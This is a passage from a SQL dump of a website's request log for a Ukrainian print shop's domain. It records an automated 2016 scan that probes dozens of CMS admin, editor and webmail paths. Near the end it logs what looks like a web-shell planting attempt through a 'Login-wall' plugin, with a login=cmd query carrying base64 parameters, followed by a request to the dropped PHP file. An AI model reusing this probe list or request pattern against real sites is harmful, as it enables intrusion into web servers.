00:00:00',301),(613,'http://www.ekvatorprint.com.ua/API/DW/Dwplugin/ThirdPartyTags/SiteFactory.xml','','','',1,0,'2016-03-09 10:11:27','0000-00-00 00:00:00',301),(614,'http://www.ekvatorprint.com.ua/Admin/Common/HelpLinks.xml','','','',1,0,'2016-03-09 10:11:27','0000-00-00 00:00:00',301),(615,'http://www.ekvatorprint.com.ua/API/DW/Dwplugin/TemplateManage/login_site.htm','','','',1,0,'2016-03-09 10:11:29','0000-00-00 00:00:00',301),(616,'http://www.ekvatorprint.com.ua/API/DW/Dwplugin/SystemLabel/SiteConfig.htm','','','',1,0,'2016-03-09 10:11:30','0000-00-00 00:00:00',301),(617,'http://www.ekvatorprint.com.ua/Admin/Login.aspx','','','',2,0,'2016-03-09 10:11:30','0000-00-00 00:00:00',301),(618,'http://www.ekvatorprint.com.ua/Admin/Images/LoginImages/admin_text.gif','','','',1,0,'2016-03-09 10:11:31','0000-00-00 00:00:00',301),(619,'http://www.ekvatorprint.com.ua/Template/Default/Skin/user/images/login_back.jpg','','','',1,0,'2016-03-09 10:11:31','0000-00-00 00:00:00',301),(620,'http://www.ekvatorprint.com.ua/Prompt/images/P_Wrong.gif','','','',1,0,'2016-03-09 10:11:31','0000-00-00 00:00:00',301),(621,'http://www.ekvatorprint.com.ua/Admin/Images/LoginImages/admin_top.gif','','','',1,0,'2016-03-09 10:11:32','0000-00-00 00:00:00',301),(622,'http://www.ekvatorprint.com.ua/cms/','','','',3,0,'2016-03-09 10:11:32','0000-00-00 00:00:00',301),(623,'http://www.ekvatorprint.com.ua/foosun/','','','',1,0,'2016-03-09 10:11:33','0000-00-00 00:00:00',301),(624,'http://www.ekvatorprint.com.ua/login/Jeecms.do','','','',1,0,'2016-03-09 10:11:35','0000-00-00 00:00:00',301),(625,'http://www.ekvatorprint.com.ua/app/login.jsp','','','',1,0,'2016-03-09 10:11:35','0000-00-00 00:00:00',301),(626,'http://www.ekvatorprint.com.ua/app/js/source/wcmlib/WCMConstants.js','','','',1,0,'2016-03-09 10:11:36','0000-00-00 00:00:00',301),(627,'http://www.ekvatorprint.com.ua/console/js/CWCMDialogHead.js','','','',1,0,'2016-03-09 10:11:36','0000-00-00 00:00:00',301),(628,'http://www.ekvatorprint.com.ua/console/include/not_login.htm','','','',1,0,'2016-03-09 10:11:37','0000-00-00 00:00:00',301),(629,'http://www.ekvatorprint.com.ua/console/auth/reg_newuser.jsp','','','',1,0,'2016-03-09 10:11:37','0000-00-00 00:00:00',301),(630,'http://www.ekvatorprint.com.ua/console/js/CTRSRequestParam.js','','','',1,0,'2016-03-09 10:11:40','0000-00-00 00:00:00',301),(631,'http://www.ekvatorprint.com.ua/app/images/login/logo.png','','','',1,0,'2016-03-09 10:11:41','0000-00-00 00:00:00',301),(632,'http://www.ekvatorprint.com.ua/app/images/login/toplogo.gif','','','',1,0,'2016-03-09 10:11:41','0000-00-00 00:00:00',301),(633,'http://www.ekvatorprint.com.ua/wcm/','','','',1,0,'2016-03-09 10:11:41','0000-00-00 00:00:00',301),(634,'http://www.ekvatorprint.com.ua/ycportal/js/wbTextBox/showimg.jsp','','','',1,0,'2016-03-09 10:11:42','0000-00-00 00:00:00',301),(635,'http://www.ekvatorprint.com.ua/ycportal/webpublish/module.main','','','',1,0,'2016-03-09 10:11:43','0000-00-00 00:00:00',301),(636,'http://www.ekvatorprint.com.ua/deptWebsiteAction.do','','','',1,0,'2016-03-09 10:11:43','0000-00-00 00:00:00',301),(637,'http://www.ekvatorprint.com.ua/m','','','',2,0,'2016-03-09 10:11:44','0000-00-00 00:00:00',301),(638,'http://www.ekvatorprint.com.ua/plug/publish','','','',1,0,'2016-03-09 10:11:44','0000-00-00 00:00:00',301),(639,'http://www.ekvatorprint.com.ua/plug/','','','',1,0,'2016-03-09 10:11:45','0000-00-00 00:00:00',301),(640,'http://www.ekvatorprint.com.ua/admin/','','','',3,0,'2016-03-09 10:11:45','0000-00-00 00:00:00',301),(641,'http://www.ekvatorprint.com.ua/api/api_user.xml','','','',1,0,'2016-03-09 10:11:46','0000-00-00 00:00:00',301),(642,'http://www.ekvatorprint.com.ua/kesion/','','','',1,0,'2016-03-09 10:11:46','0000-00-00 00:00:00',301),(643,'http://www.ekvatorprint.com.ua/app/home/skins/default/style.css','','','',1,0,'2016-03-09 10:11:46','0000-00-00 00:00:00',301),(644,'http://www.ekvatorprint.com.ua/data/admin/ver.txt','','','',1,0,'2016-03-09 10:11:47','0000-00-00 00:00:00',301),(645,'http://www.ekvatorprint.com.ua/digg.php','','','',1,0,'2016-03-09 10:11:48','0000-00-00 00:00:00',301),(646,'http://www.ekvatorprint.com.ua/plus/sitemap.html','','','',1,0,'2016-03-09 10:11:48','0000-00-00 00:00:00',301),(647,'http://www.ekvatorprint.com.ua/plus/rssmap.html','','','',1,0,'2016-03-09 10:11:48','0000-00-00 00:00:00',301),(648,'http://www.ekvatorprint.com.ua/plus/heightsearch.php','','','',1,0,'2016-03-09 10:11:49','0000-00-00 00:00:00',301),(649,'http://www.ekvatorprint.com.ua/member/space/company/info.txt','','','',1,0,'2016-03-09 10:11:49','0000-00-00 00:00:00',301),(650,'http://www.ekvatorprint.com.ua/dedecms/','','','',1,0,'2016-03-09 10:11:50','0000-00-00 00:00:00',301),(651,'http://www.ekvatorprint.com.ua/dede/','','','',1,0,'2016-03-09 10:11:50','0000-00-00 00:00:00',301),(652,'http://www.ekvatorprint.com.ua/phpcms/','','','',1,0,'2016-03-09 10:11:54','0000-00-00 00:00:00',301),(653,'http://www.ekvatorprint.com.ua/siteserver/upgrade/default.aspx','','','',1,0,'2016-03-09 10:11:56','0000-00-00 00:00:00',301),(654,'http://www.ekvatorprint.com.ua/siteserver/login.aspx','','','',1,0,'2016-03-09 10:11:56','0000-00-00 00:00:00',301),(655,'http://www.ekvatorprint.com.ua/UserCenter/css/admin/bgimg/admin_all_bg.png','','','',1,0,'2016-03-09 10:11:57','0000-00-00 00:00:00',301),(656,'http://www.ekvatorprint.com.ua/admin/start/index.php','','','',1,0,'2016-03-09 10:11:57','0000-00-00 00:00:00',301),(657,'http://www.ekvatorprint.com.ua/aspcms/','','','',1,0,'2016-03-09 10:11:58','0000-00-00 00:00:00',301),(658,'http://www.ekvatorprint.com.ua/inc/playerKinds.xml','','','',1,0,'2016-03-09 10:11:58','0000-00-00 00:00:00',301),(659,'http://www.ekvatorprint.com.ua/maxcms/','','','',1,0,'2016-03-09 10:11:59','0000-00-00 00:00:00',301),(660,'http://www.ekvatorprint.com.ua/adminsoft/templates/images/login_bg_top.jpg','','','',1,0,'2016-03-09 10:11:59','0000-00-00 00:00:00',301),(661,'http://www.ekvatorprint.com.ua/install','','','',1,0,'2016-03-09 10:12:00','0000-00-00 00:00:00',301),(662,'http://www.ekvatorprint.com.ua/oecms/','','','',1,0,'2016-03-09 10:12:00','0000-00-00 00:00:00',301),(663,'http://www.ekvatorprint.com.ua/e/master/login.aspx','','','',1,0,'2016-03-09 10:12:01','0000-00-00 00:00:00',301),(664,'http://www.ekvatorprint.com.ua/master/login.aspx','','','',1,0,'2016-03-09 10:12:01','0000-00-00 00:00:00',301),(665,'http://www.ekvatorprint.com.ua/jxcms/','','','',1,0,'2016-03-09 10:12:02','0000-00-00 00:00:00',301),(666,'http://www.ekvatorprint.com.ua/lazycms/','','','',1,0,'2016-03-09 10:12:02','0000-00-00 00:00:00',301),(667,'http://www.ekvatorprint.com.ua/bencandy.php','','','',1,0,'2016-03-09 10:12:03','0000-00-00 00:00:00',301),(668,'http://www.ekvatorprint.com.ua/images/default/post_bt.gif','','','',1,0,'2016-03-09 10:12:03','0000-00-00 00:00:00',301),(669,'http://www.ekvatorprint.com.ua/ch/','','','',1,0,'2016-03-09 10:12:04','0000-00-00 00:00:00',301),(670,'http://www.ekvatorprint.com.ua/metinfo/','','','',1,0,'2016-03-09 10:12:05','0000-00-00 00:00:00',301),(671,'http://www.ekvatorprint.com.ua/Error.aspx','','','',1,0,'2016-03-09 10:12:06','0000-00-00 00:00:00',301),(672,'http://www.ekvatorprint.com.ua/whir_system/login.aspx','','','',1,0,'2016-03-09 10:12:06','0000-00-00 00:00:00',301),(673,'http://www.ekvatorprint.com.ua/whir_system/module/security/login.aspx','','','',1,0,'2016-03-09 10:12:07','0000-00-00 00:00:00',301),(674,'http://www.ekvatorprint.com.ua/system/Login.aspx','','','',1,0,'2016-03-09 10:12:09','0000-00-00 00:00:00',301),(675,'http://www.ekvatorprint.com.ua/verycms/','','','',1,0,'2016-03-09 10:12:09','0000-00-00 00:00:00',301),(676,'http://www.ekvatorprint.com.ua/Help','','','',1,0,'2016-03-09 10:12:10','0000-00-00 00:00:00',301),(677,'http://www.ekvatorprint.com.ua/images/branding/logo.gif','','','',1,0,'2016-03-09 10:12:10','0000-00-00 00:00:00',301),(678,'http://www.ekvatorprint.com.ua/Install/logo.gif','','','',1,0,'2016-03-09 10:12:10','0000-00-00 00:00:00',301),(679,'http://www.ekvatorprint.com.ua/empirecms/','','','',1,0,'2016-03-09 10:12:11','0000-00-00 00:00:00',301),(680,'http://www.ekvatorprint.com.ua/jcms/index.jsp','','','',1,0,'2016-03-09 10:12:11','0000-00-00 00:00:00',301),(681,'http://www.ekvatorprint.com.ua/jcms/index_jcms.jsp','','','',1,0,'2016-03-09 10:12:12','0000-00-00 00:00:00',301),(682,'http://www.ekvatorprint.com.ua/cmseasy/','','','',1,0,'2016-03-09 10:12:12','0000-00-00 00:00:00',301),(683,'http://www.ekvatorprint.com.ua/Ntalker/lawfirm.aspx?17','','','',1,0,'2016-03-09 10:12:13','0000-00-00 00:00:00',301),(684,'http://www.ekvatorprint.com.ua/Search.html','','','',1,0,'2016-03-09 10:12:13','0000-00-00 00:00:00',301),(685,'http://www.ekvatorprint.com.ua/admin','','','',1,0,'2016-03-09 10:12:14','0000-00-00 00:00:00',301),(686,'http://www.ekvatorprint.com.ua/list.php','','','',1,0,'2016-03-09 10:12:14','0000-00-00 00:00:00',301),(687,'http://www.ekvatorprint.com.ua/admin/template/article_more/config.htm','','','',1,0,'2016-03-09 10:12:15','0000-00-00 00:00:00',301),(688,'http://www.ekvatorprint.com.ua/admin/inc/xml.xslt','','','',1,0,'2016-03-09 10:12:15','0000-00-00 00:00:00',301),(689,'http://www.ekvatorprint.com.ua/template/home.htm','','','',1,0,'2016-03-09 10:12:16','0000-00-00 00:00:00',301),(690,'http://www.ekvatorprint.com.ua/system/skins/default/system.login.htm','','','',1,0,'2016-03-09 10:12:16','0000-00-00 00:00:00',301),(691,'http://www.ekvatorprint.com.ua/system/language/zh-cn.xml','','','',1,0,'2016-03-09 10:12:17','0000-00-00 00:00:00',301),(692,'http://www.ekvatorprint.com.ua/kingcms/','','','',1,0,'2016-03-09 10:12:17','0000-00-00 00:00:00',301),(693,'http://www.ekvatorprint.com.ua/admin.php','','','',1,0,'2016-03-09 10:12:18','0000-00-00 00:00:00',301),(694,'http://www.ekvatorprint.com.ua/CHANGELOG.txt','','','',2,0,'2016-03-09 10:12:18','0000-00-00 00:00:00',301),(695,'http://www.ekvatorprint.com.ua/drupal/','','','',1,0,'2016-03-09 10:12:19','0000-00-00 00:00:00',301),(696,'http://www.ekvatorprint.com.ua/zcms/','','','',1,0,'2016-03-09 10:12:20','0000-00-00 00:00:00',301),(697,'http://www.ekvatorprint.com.ua/docs.css','','','',1,0,'2016-03-09 10:12:20','0000-00-00 00:00:00',301),(698,'http://www.ekvatorprint.com.ua/phpmyadmin/','','','',1,0,'2016-03-09 10:12:21','0000-00-00 00:00:00',301),(699,'http://www.ekvatorprint.com.ua/phpmyadmin/docs.css','','','',1,0,'2016-03-09 10:12:21','0000-00-00 00:00:00',301),(700,'http://www.ekvatorprint.com.ua/js/ajax_x.js','','','',1,0,'2016-03-09 10:12:22','0000-00-00 00:00:00',301),(701,'http://www.ekvatorprint.com.ua/images/login_03.gif','','','',1,0,'2016-03-09 10:12:22','0000-00-00 00:00:00',301),(702,'http://www.ekvatorprint.com.ua/images/zh-CN/logo.ico','','','',1,0,'2016-03-09 10:12:24','0000-00-00 00:00:00',301),(703,'http://www.ekvatorprint.com.ua/images/zh-CN/winisp.gif','','','',1,0,'2016-03-09 10:12:24','0000-00-00 00:00:00',301),(704,'http://www.ekvatorprint.com.ua/images/login9/login_33.jpg','','','',1,0,'2016-03-09 10:12:25','0000-00-00 00:00:00',301),(705,'http://www.ekvatorprint.com.ua/webmail/','','','',3,0,'2016-03-09 10:12:25','0000-00-00 00:00:00',301),(706,'http://www.ekvatorprint.com.ua/mail/','','','',3,0,'2016-03-09 10:12:26','0000-00-00 00:00:00',301),(707,'http://www.ekvatorprint.com.ua/help/ch_gb/images/help-title.gif','','','',1,0,'2016-03-09 10:12:26','0000-00-00 00:00:00',301),(708,'http://www.ekvatorprint.com.ua/admin/index.php','','','',1,0,'2016-03-09 10:12:26','0000-00-00 00:00:00',301),(709,'http://www.ekvatorprint.com.ua/web2/login_template/1.files/Logo1.jpg','','','',1,0,'2016-03-09 10:12:30','0000-00-00 00:00:00',301),(710,'http://www.ekvatorprint.com.ua/Images/login/biaoti.jpg','','','',1,0,'2016-03-09 10:12:31','0000-00-00 00:00:00',301),(711,'http://www.ekvatorprint.com.ua/Images/login/lefttu.jpg','','','',1,0,'2016-03-09 10:12:31','0000-00-00 00:00:00',301),(712,'http://www.ekvatorprint.com.ua/Images/login/mainlogo.gif','','','',1,0,'2016-03-09 10:12:32','0000-00-00 00:00:00',301),(713,'http://www.ekvatorprint.com.ua/next/img/logo.gif','','','',1,0,'2016-03-09 10:12:32','0000-00-00 00:00:00',301),(714,'http://www.ekvatorprint.com.ua/maintlogin.jsp','','','',1,0,'2016-03-09 10:12:33','0000-00-00 00:00:00',301),(715,'http://www.ekvatorprint.com.ua/auth/login','','','',2,0,'2016-03-09 10:12:33','0000-00-00 00:00:00',301),(716,'http://www.ekvatorprint.com.ua/alimail/','','','',1,0,'2016-03-09 10:12:34','0000-00-00 00:00:00',301),(717,'http://www.ekvatorprint.com.ua/images/hwem.css','','','',1,0,'2016-03-09 10:12:35','0000-00-00 00:00:00',301),(718,'http://www.ekvatorprint.com.ua/common/help/images/helplogo.gif','','','',1,0,'2016-03-09 10:12:36','0000-00-00 00:00:00',301),(719,'http://www.ekvatorprint.com.ua/common/help/images/helplogo_zh.gif','','','',1,0,'2016-03-09 10:12:36','0000-00-00 00:00:00',301),(720,'http://www.ekvatorprint.com.ua/coremail/common/help/images/helplogo_zh.gif','','','',1,0,'2016-03-09 10:12:37','0000-00-00 00:00:00',301),(721,'http://www.ekvatorprint.com.ua/coremail/common/help/images/helplogo.gif','','','',1,0,'2016-03-09 10:12:37','0000-00-00 00:00:00',301),(722,'http://www.ekvatorprint.com.ua/coremail/','','','',1,0,'2016-03-09 10:12:38','0000-00-00 00:00:00',301),(723,'http://www.ekvatorprint.com.ua/tpl/user/tpl1/css/skins/blue.css','','','',1,0,'2016-03-09 10:12:39','0000-00-00 00:00:00',301),(724,'http://www.ekvatorprint.com.ua/images/login/eyoumail.gif','','','',1,0,'2016-03-09 10:12:39','0000-00-00 00:00:00',301),(725,'http://www.ekvatorprint.com.ua/images/login/logo.gif','','','',1,0,'2016-03-09 10:12:40','0000-00-00 00:00:00',301),(726,'http://www.ekvatorprint.com.ua/tpl/login/user/images/login_bg_1.jpg','','','',1,0,'2016-03-09 10:12:41','0000-00-00 00:00:00',301),(727,'http://www.ekvatorprint.com.ua/images/login/icon-up.gif','','','',1,0,'2016-03-09 10:12:41','0000-00-00 00:00:00',301),(728,'http://www.ekvatorprint.com.ua/index.cgi','','','',1,0,'2016-03-09 10:12:42','0000-00-00 00:00:00',301),(729,'http://www.ekvatorprint.com.ua/cgi/index.cgi','','','',1,0,'2016-03-09 10:12:42','0000-00-00 00:00:00',301),(730,'http://www.ekvatorprint.com.ua/default/images/logo.gif','','','',1,0,'2016-03-09 10:12:43','0000-00-00 00:00:00',301),(731,'http://www.ekvatorprint.com.ua/extman/default/images/logo.gif','','','',1,0,'2016-03-09 10:12:43','0000-00-00 00:00:00',301),(732,'http://www.ekvatorprint.com.ua/extmail/','','','',1,0,'2016-03-09 10:12:44','0000-00-00 00:00:00',301),(733,'http://www.ekvatorprint.com.ua/helpnew/faq/faq_simple_zh_CN.jsp','','','',1,0,'2016-03-09 10:12:44','0000-00-00 00:00:00',301),(734,'http://www.ekvatorprint.com.ua/ymail/images/index_r1_c4.jpg','','','',1,0,'2016-03-09 10:12:45','0000-00-00 00:00:00',301),(735,'http://www.ekvatorprint.com.ua/default/css/em_css.css','','','',1,0,'2016-03-09 10:12:46','0000-00-00 00:00:00',301),(736,'http://www.ekvatorprint.com.ua/fangmail/','','','',1,0,'2016-03-09 10:12:46','0000-00-00 00:00:00',301),(737,'http://www.ekvatorprint.com.ua/addons/theme/stv1/_static/image/favicon.ico','','','',1,0,'2016-03-09 10:12:47','0000-00-00 00:00:00',301),(738,'http://www.ekvatorprint.com.ua/apps/admin/_static/image/login_box_bg.png','','','',1,0,'2016-03-09 10:12:48','0000-00-00 00:00:00',301),(739,'http://www.ekvatorprint.com.ua/addons/theme/stv1/_static/ts2/layout.css','','','',1,0,'2016-03-09 10:12:49','0000-00-00 00:00:00',301),(740,'http://www.ekvatorprint.com.ua/addons/theme/stv2/_static/ts2/layout.css','','','',1,0,'2016-03-09 10:12:49','0000-00-00 00:00:00',301),(741,'http://www.ekvatorprint.com.ua/inc/rsd.php','','','',1,0,'2016-03-09 10:12:50','0000-00-00 00:00:00',301),(742,'http://www.ekvatorprint.com.ua/blog/','','','',3,0,'2016-03-09 10:12:51','0000-00-00 00:00:00',301),(743,'http://www.ekvatorprint.com.ua/weblog/','','','',3,0,'2016-03-09 10:12:52','0000-00-00 00:00:00',301),(744,'http://www.ekvatorprint.com.ua/history.txt','','','',1,0,'2016-03-09 10:12:53','0000-00-00 00:00:00',301),(745,'http://www.ekvatorprint.com.ua/common/common.js','','','',1,0,'2016-03-09 10:12:53','0000-00-00 00:00:00',301),(746,'http://www.ekvatorprint.com.ua/rss.php','','','',2,0,'2016-03-09 10:12:55','0000-00-00 00:00:00',301),(747,'http://www.ekvatorprint.com.ua/wp-cron.php','','','',1,0,'2016-03-09 10:12:56','0000-00-00 00:00:00',301),(748,'http://www.ekvatorprint.com.ua/wp-content','','','',1,0,'2016-03-09 10:12:57','0000-00-00 00:00:00',301),(749,'http://www.ekvatorprint.com.ua/wp-login.php','','','',1,0,'2016-03-09 10:12:57','0000-00-00 00:00:00',301),(750,'http://www.ekvatorprint.com.ua/readme.html','','','',1,0,'2016-03-09 10:12:58','0000-00-00 00:00:00',301),(751,'http://www.ekvatorprint.com.ua/wordpress/','','','',1,0,'2016-03-09 10:12:59','0000-00-00 00:00:00',301),(752,'http://www.ekvatorprint.com.ua/wp/','','','',1,0,'2016-03-09 10:13:00','0000-00-00 00:00:00',301),(753,'http://www.ekvatorprint.com.ua/feed.asp','','','',1,0,'2016-03-09 10:13:00','0000-00-00 00:00:00',301),(754,'http://www.ekvatorprint.com.ua/zblog/','','','',1,0,'2016-03-09 10:13:00','0000-00-00 00:00:00',301),(755,'http://www.ekvatorprint.com.ua/inc/Templates/rss.xslt','','','',1,0,'2016-03-09 10:13:01','0000-00-00 00:00:00',301),(756,'http://www.ekvatorprint.com.ua/dvbbs/','','','',1,0,'2016-03-09 10:13:01','0000-00-00 00:00:00',301),(757,'http://www.ekvatorprint.com.ua/bbs/','','','',3,0,'2016-03-09 10:13:02','0000-00-00 00:00:00',301),(758,'http://www.ekvatorprint.com.ua/forum/','','','',3,0,'2016-03-09 10:13:03','0000-00-00 00:00:00',301),(759,'http://www.ekvatorprint.com.ua/leadbbs/','','','',1,0,'2016-03-09 10:13:04','0000-00-00 00:00:00',301),(760,'http://www.ekvatorprint.com.ua/archiver/','','','',1,0,'2016-03-09 10:13:05','0000-00-00 00:00:00',301),(761,'http://www.ekvatorprint.com.ua/discuz/','','','',2,0,'2016-03-09 10:13:07','0000-00-00 00:00:00',301),(762,'http://www.ekvatorprint.com.ua/archiver','','','',3,0,'2016-03-09 10:13:10','0000-00-00 00:00:00',301),(763,'http://www.ekvatorprint.com.ua/rss.aspx','','','',1,0,'2016-03-09 10:13:13','0000-00-00 00:00:00',301),(764,'http://www.ekvatorprint.com.ua/max-templates/classic/styles/app.css','','','',1,0,'2016-03-09 10:13:14','0000-00-00 00:00:00',301),(765,'http://www.ekvatorprint.com.ua/bbsmax/','','','',1,0,'2016-03-09 10:13:14','0000-00-00 00:00:00',301),(766,'http://www.ekvatorprint.com.ua/archive/archive.css','','','',1,0,'2016-03-09 10:13:15','0000-00-00 00:00:00',301),(767,'http://www.ekvatorprint.com.ua/clientscript/vbulletin_ajax_htmlloader.js','','','',1,0,'2016-03-09 10:13:15','0000-00-00 00:00:00',301),(768,'http://www.ekvatorprint.com.ua/extern.php?action=feed&type=atom','','','',1,0,'2016-03-09 10:13:16','0000-00-00 00:00:00',301),(769,'http://www.ekvatorprint.com.ua/fluxbb/','','','',1,0,'2016-03-09 10:13:16','0000-00-00 00:00:00',301),(770,'http://www.ekvatorprint.com.ua/phpbb/','','','',1,0,'2016-03-09 10:13:17','0000-00-00 00:00:00',301),(771,'http://www.ekvatorprint.com.ua/tools/rss.aspx','','','',1,0,'2016-03-09 10:13:18','0000-00-00 00:00:00',301),(772,'http://www.ekvatorprint.com.ua/licence.txt','','','',1,0,'2016-03-09 10:13:19','0000-00-00 00:00:00',301),(773,'http://www.ekvatorprint.com.ua/phpwind/','','','',1,0,'2016-03-09 10:13:20','0000-00-00 00:00:00',301),(774,'http://www.ekvatorprint.com.ua/admin/js/IdSUtil.js','','','',1,0,'2016-03-09 10:13:21','0000-00-00 00:00:00',301),(775,'http://www.ekvatorprint.com.ua/ids/admin/login.jsp','','','',1,0,'2016-03-09 10:13:21','0000-00-00 00:00:00',301),(776,'http://www.ekvatorprint.com.ua/ids/admin/userhome/forgetPwd.jsp','','','',1,0,'2016-03-09 10:13:22','0000-00-00 00:00:00',301),(777,'http://www.ekvatorprint.com.ua/fckeditor/fckconfig.js','','','',1,0,'2016-03-09 10:13:23','0000-00-00 00:00:00',301),(778,'http://www.ekvatorprint.com.ua/fckeditor/editor/dtd/fck_dtd_test.html','','','',1,0,'2016-03-09 10:13:23','0000-00-00 00:00:00',301),(779,'http://www.ekvatorprint.com.ua/fckeditor/license.txt','','','',1,0,'2016-03-09 10:13:24','0000-00-00 00:00:00',301),(780,'http://www.ekvatorprint.com.ua/fckeditor/editor/js/fckeditorcode_ie.js','','','',2,0,'2016-03-09 10:13:25','0000-00-00 00:00:00',301),(781,'http://www.ekvatorprint.com.ua/fckeditor/fckeditor.js','','','',1,0,'2016-03-09 10:13:26','0000-00-00 00:00:00',301),(782,'http://www.ekvatorprint.com.ua/FCK/editor/js/fckeditorcode_ie.js','','','',1,0,'2016-03-09 10:13:27','0000-00-00 00:00:00',301),(783,'http://www.ekvatorprint.com.ua/FCK/fckeditor.js','','','',1,0,'2016-03-09 10:13:27','0000-00-00 00:00:00',301),(784,'http://www.ekvatorprint.com.ua/fckeditor.js','','','',1,0,'2016-03-09 10:13:28','0000-00-00 00:00:00',301),(785,'http://www.ekvatorprint.com.ua/editor/js/fckeditorcode_ie.js','','','',1,0,'2016-03-09 10:13:28','0000-00-00 00:00:00',301),(786,'http://www.ekvatorprint.com.ua/manage/','','','',2,0,'2016-03-09 10:13:30','0000-00-00 00:00:00',301),(787,'http://www.ekvatorprint.com.ua/editor/dtd/','','','',2,0,'2016-03-09 10:13:30','0000-00-00 00:00:00',301),(788,'http://www.ekvatorprint.com.ua/editor/','','','',3,0,'2016-03-09 10:13:31','0000-00-00 00:00:00',301),(789,'http://www.ekvatorprint.com.ua/system/','','','',2,0,'2016-03-09 10:13:31','0000-00-00 00:00:00',301),(790,'http://www.ekvatorprint.com.ua/ckeditor/ckeditor.js','','','',1,0,'2016-03-09 10:13:31','0000-00-00 00:00:00',301),(791,'http://www.ekvatorprint.com.ua/ckfinder/ckfinder.html','','','',1,0,'2016-03-09 10:13:34','0000-00-00 00:00:00',301),(792,'http://www.ekvatorprint.com.ua/ckfinder/install.txt','','','',1,0,'2016-03-09 10:13:35','0000-00-00 00:00:00',301),(793,'http://www.ekvatorprint.com.ua/ckeditor/ckfinder/ckfinder.html','','','',1,0,'2016-03-09 10:13:36','0000-00-00 00:00:00',301),(794,'http://www.ekvatorprint.com.ua/ckeditor/ckfinder/install.txt','','','',1,0,'2016-03-09 10:13:37','0000-00-00 00:00:00',301),(795,'http://www.ekvatorprint.com.ua/libs/','','','',1,0,'2016-03-09 10:13:37','0000-00-00 00:00:00',301),(796,'http://www.ekvatorprint.com.ua/includes/ckfinder/ckfinder.html','','','',1,0,'2016-03-09 10:13:38','0000-00-00 00:00:00',301),(797,'http://www.ekvatorprint.com.ua/includes/ckfinder/install.txt','','','',1,0,'2016-03-09 10:13:38','0000-00-00 00:00:00',301),(798,'http://www.ekvatorprint.com.ua/includes/ckeditor/ckfinder/ckfinder.html','','','',1,0,'2016-03-09 10:13:39','0000-00-00 00:00:00',301),(799,'http://www.ekvatorprint.com.ua/includes/ckeditor/ckfinder/install.txt','','','',1,0,'2016-03-09 10:13:40','0000-00-00 00:00:00',301),(800,'http://www.ekvatorprint.com.ua/admin/includes/','','','',1,0,'2016-03-09 10:13:41','0000-00-00 00:00:00',301),(801,'http://www.ekvatorprint.com.ua/dialog/dialog.js','','','',1,0,'2016-03-09 10:13:41','0000-00-00 00:00:00',301),(802,'http://www.ekvatorprint.com.ua/Editor.js','','','',1,0,'2016-03-09 10:13:42','0000-00-00 00:00:00',301),(803,'http://www.ekvatorprint.com.ua/js/buttons.js','','','',1,0,'2016-03-09 10:13:43','0000-00-00 00:00:00',301),(804,'http://www.ekvatorprint.com.ua/eweb/','','','',1,0,'2016-03-09 10:13:44','0000-00-00 00:00:00',301),(805,'http://www.ekvatorprint.com.ua/eWebEditor/','','','',2,0,'2016-03-09 10:13:44','0000-00-00 00:00:00',301),(806,'http://www.ekvatorprint.com.ua/webedit/','','','',1,0,'2016-03-09 10:13:44','0000-00-00 00:00:00',301),(807,'http://www.ekvatorprint.com.ua/admin/eWebEditor/','','','',1,0,'2016-03-09 10:13:45','0000-00-00 00:00:00',301),(808,'http://www.ekvatorprint.com.ua/kindeditor-min.js','','','',1,0,'2016-03-09 10:13:46','0000-00-00 00:00:00',301),(809,'http://www.ekvatorprint.com.ua/kindeditor.js','','','',1,0,'2016-03-09 10:13:46','0000-00-00 00:00:00',301),(810,'http://www.ekvatorprint.com.ua/lang/en.js','','','',1,0,'2016-03-09 10:13:47','0000-00-00 00:00:00',301),(811,'http://www.ekvatorprint.com.ua/themes/default/default.css','','','',1,0,'2016-03-09 10:13:47','0000-00-00 00:00:00',301),(812,'http://www.ekvatorprint.com.ua/examples/index.html','','','',1,0,'2016-03-09 10:13:48','0000-00-00 00:00:00',301),(813,'http://www.ekvatorprint.com.ua/examples/file-manager.html','','','',1,0,'2016-03-09 10:13:48','0000-00-00 00:00:00',301),(814,'http://www.ekvatorprint.com.ua/plugins/filemanager/filemanager/js','','','',1,0,'2016-03-09 10:13:49','0000-00-00 00:00:00',301),(815,'http://www.ekvatorprint.com.ua/plugins/anchor/anchor.js','','','',1,0,'2016-03-09 10:13:49','0000-00-00 00:00:00',301),(816,'http://www.ekvatorprint.com.ua/asp.net/README.txt','','','',1,0,'2016-03-09 10:13:49','0000-00-00 00:00:00',301),(817,'http://www.ekvatorprint.com.ua/examples/readonly.html','','','',1,0,'2016-03-09 10:13:50','0000-00-00 00:00:00',301),(818,'http://www.ekvatorprint.com.ua/statics/','','','',1,0,'2016-03-09 10:13:52','0000-00-00 00:00:00',301),(819,'http://www.ekvatorprint.com.ua/kindeditor/','','','',1,0,'2016-03-09 10:13:53','0000-00-00 00:00:00',301),(820,'http://www.ekvatorprint.com.ua/KEdit/','','','',1,0,'2016-03-09 10:13:53','0000-00-00 00:00:00',301),(821,'http://www.ekvatorprint.com.ua/admin/SouthidcEditor/Dialog/dialog.js','','','',1,0,'2016-03-09 10:13:54','0000-00-00 00:00:00',301),(822,'http://www.ekvatorprint.com.ua/admin/SouthidcEditor/ewebeditor.asp?id=57&style=southidc','','','',1,0,'2016-03-09 10:13:54','0000-00-00 00:00:00',301),(823,'http://www.ekvatorprint.com.ua/admin/SouthidcEditor/ButtonImage/standard/componentmenu.gif','','','',1,0,'2016-03-09 10:13:55','0000-00-00 00:00:00',301),(824,'http://www.ekvatorprint.com.ua/CuteSoft_Client/CuteEditor/ImageEditor/listfiles.aspx','','','',1,0,'2016-03-09 10:13:55','0000-00-00 00:00:00',301),(825,'http://www.ekvatorprint.com.ua/CuteSoft_Client/CuteEditor/Help/default.htm','','','',1,0,'2016-03-09 10:13:55','0000-00-00 00:00:00',301),(826,'http://www.ekvatorprint.com.ua/CuteSoft_Client/CuteEditor/Images/log.gif','','','',1,0,'2016-03-09 10:13:56','0000-00-00 00:00:00',301),(827,'http://www.ekvatorprint.com.ua/CuteSoft_Client/CuteEditor/Style/IE.css','','','',1,0,'2016-03-09 10:13:56','0000-00-00 00:00:00',301),(828,'http://ekvatorprint.com.ua/wp-content/plugins/Login-wall-etgFB/login_wall.php?login=cmd&z3=MTExNzIzMDUucGhw&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=','','ekvatorprint.com.ua','',1,0,'2016-03-09 12:04:21','0000-00-00 00:00:00',301),(829,'http://ekvatorprint.com.ua/wp-content/plugins/11172305.php','','http://www.googlebot.com/bot.html','',1,0,'2016-03-09 12:04:21','0000-00-00 00:00:00',301),(830,'http://ekvatorprint.com.ua/apple-touch-icon-72x72-precomposed.png','','','',6,0,'2016-03-09 